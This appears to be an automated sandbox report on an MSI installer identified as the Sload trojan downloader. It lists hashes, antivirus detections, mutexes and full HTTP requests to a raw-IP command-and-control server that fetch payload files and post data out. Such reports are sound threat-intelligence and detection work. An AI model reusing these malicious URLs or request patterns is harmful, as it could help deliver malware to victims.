- * MalFamily: "Sload"
- * MalScore: 8.1
- * File Name: "XCDXSED_COMPROBANTE_NSHSG_82829N_2019.msi"
- * File Size: 28672
- * File Type: "Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft Installer, Author: cfyveqkn, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Installer., Template: Intel;1033, Revision Number: FF7C1356-1066-4504-9B96-F11732241BBE Create Time/Date: Tue Aug 13 02:22:50 2019, Last Saved Time/Date: Tue Aug 13 02:22:50 2019, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.1.2318), Security: 2"
- * SHA256: "b03641f8ced65f0977feb0c13a3609e976818c47a4fdaafbd65cf5197ab10cb0"
- * MD5: "5f44643f4c331503d3a4b64f72097b3a"
- * SHA1: "b2e17c918abe854493a9210867f97065795f820f"
- * SHA512: "3563ad26f556044a4444114fbd0175a1bd037352c63a96601c2ff0e1550ee5edcea947e380676487b63b84317178760219dee079264e577ed24046374160b611"
- * CRC32: "A609AA71"
- * SSDEEP: "192:ST+1Tgcw4VdT+lnPqFCQeIg5njLOnEoXlZENjH4wxF:11T9w4jTmnSFbTg5P9oXgNs6F"
- * Process Execution:
- "msiexec.exe"
- * Executed Commands:
- * Signatures Detected:
- "Description": "File has been identified by 2 Antiviruses on VirusTotal as malicious",
- "Details":
- "Kaspersky": "HEUR:Trojan-Downloader.VBS.SLoad.gen"
- "ZoneAlarm": "HEUR:Trojan-Downloader.VBS.SLoad.gen"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "http_version_old": "HTTP traffic uses version 1.0"
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- "suspicious_request": "http://3.15.160.35/v14/thu1.php"
- "suspicious_request": "http://3.15.160.35/v14/mqxa.php"
- "suspicious_request": "http://3.15.160.35/v14/m/mqx160.thu"
- "suspicious_request": "http://3.15.160.35/v14/mqxa1.thu"
- "suspicious_request": "http://3.15.160.35/v14/mqxasq.thu"
- "suspicious_request": "http://3.15.160.35/v14/mqxasl.thu"
- "suspicious_request": "http://3.15.160.35/v14/mqxass.thu"
- "suspicious_request": "http://3.15.160.35/v14/"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://3.15.160.35/v14/thu1.php"
- "url": "http://3.15.160.35/v14/mqxa.php"
- "url": "http://3.15.160.35/v14/m/mqx160.thu"
- "url": "http://3.15.160.35/v14/mqxa1.thu"
- "url": "http://3.15.160.35/v14/mqxasq.thu"
- "url": "http://3.15.160.35/v14/mqxasl.thu"
- "url": "http://3.15.160.35/v14/mqxass.thu"
- "url": "http://3.15.160.35/v14/"
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET USER_AGENTS PTsecurity Possible Trojan.Downloader UserAgent (binary_getter)"
- * Started Service:
- * Mutexes:
- "CicLoadWinStaWinSta0",
- "Local\\MSCTF.CtfMonitorInstMutexDefault1",
- "Global\\_MSIExecute"
- * Modified Files:
- * Deleted Files:
- * Modified Registry Keys:
- * Deleted Registry Keys:
- * DNS Communications:
- * Domains:
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 2,
- "body": "",
- "uri": "http://3.15.160.35/v14/thu1.php",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
- "method": "POST",
- "host": "3.15.160.35",
- "version": "1.1",
- "path": "/v14/thu1.php",
- "data": "POST /v14/thu1.php HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 3.15.160.35\r\nContent-Length: 3\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://3.15.160.35/v14/mqxa.php",
- "user-agent": "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)",
- "method": "GET",
- "host": "3.15.160.35",
- "version": "1.1",
- "path": "/v14/mqxa.php",
- "data": "GET /v14/mqxa.php HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: text/xml\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: 3.15.160.35\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://3.15.160.35/v14/m/mqx160.thu",
- "user-agent": "binary_getter/1.0",
- "method": "GET",
- "host": "3.15.160.35",
- "version": "1.1",
- "path": "/v14/m/mqx160.thu",
- "data": "GET /v14/m/mqx160.thu HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: text/plain; Charset=UTF-8\r\nAccept: */*\r\nUser-Agent: binary_getter/1.0\r\nHost: 3.15.160.35\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://3.15.160.35/v14/mqxa1.thu",
- "user-agent": "binary_getter/1.0",
- "method": "GET",
- "host": "3.15.160.35",
- "version": "1.1",
- "path": "/v14/mqxa1.thu",
- "data": "GET /v14/mqxa1.thu HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: text/plain; Charset=UTF-8\r\nAccept: */*\r\nUser-Agent: binary_getter/1.0\r\nHost: 3.15.160.35\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://3.15.160.35/v14/mqxasq.thu",
- "user-agent": "binary_getter/1.0",
- "method": "GET",
- "host": "3.15.160.35",
- "version": "1.1",
- "path": "/v14/mqxasq.thu",
- "data": "GET /v14/mqxasq.thu HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: text/plain; Charset=UTF-8\r\nAccept: */*\r\nUser-Agent: binary_getter/1.0\r\nHost: 3.15.160.35\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://3.15.160.35/v14/mqxasl.thu",
- "user-agent": "binary_getter/1.0",
- "method": "GET",
- "host": "3.15.160.35",
- "version": "1.1",
- "path": "/v14/mqxasl.thu",
- "data": "GET /v14/mqxasl.thu HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: text/plain; Charset=UTF-8\r\nAccept: */*\r\nUser-Agent: binary_getter/1.0\r\nHost: 3.15.160.35\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://3.15.160.35/v14/mqxass.thu",
- "user-agent": "binary_getter/1.0",
- "method": "GET",
- "host": "3.15.160.35",
- "version": "1.1",
- "path": "/v14/mqxass.thu",
- "data": "GET /v14/mqxass.thu HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: text/plain; Charset=UTF-8\r\nAccept: */*\r\nUser-Agent: binary_getter/1.0\r\nHost: 3.15.160.35\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://3.15.160.35/v14/",
- "user-agent": "Mozilla/3.0 (compatible; Indy Library)",
- "method": "POST",
- "host": "3.15.160.35",
- "version": "1.0",
- "path": "/v14/",
- "data": "POST /v14/ HTTP/1.0\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 238\r\nHost: 3.15.160.35\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: identity\r\nUser-Agent: Mozilla/3.0 (compatible; Indy Library)\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC: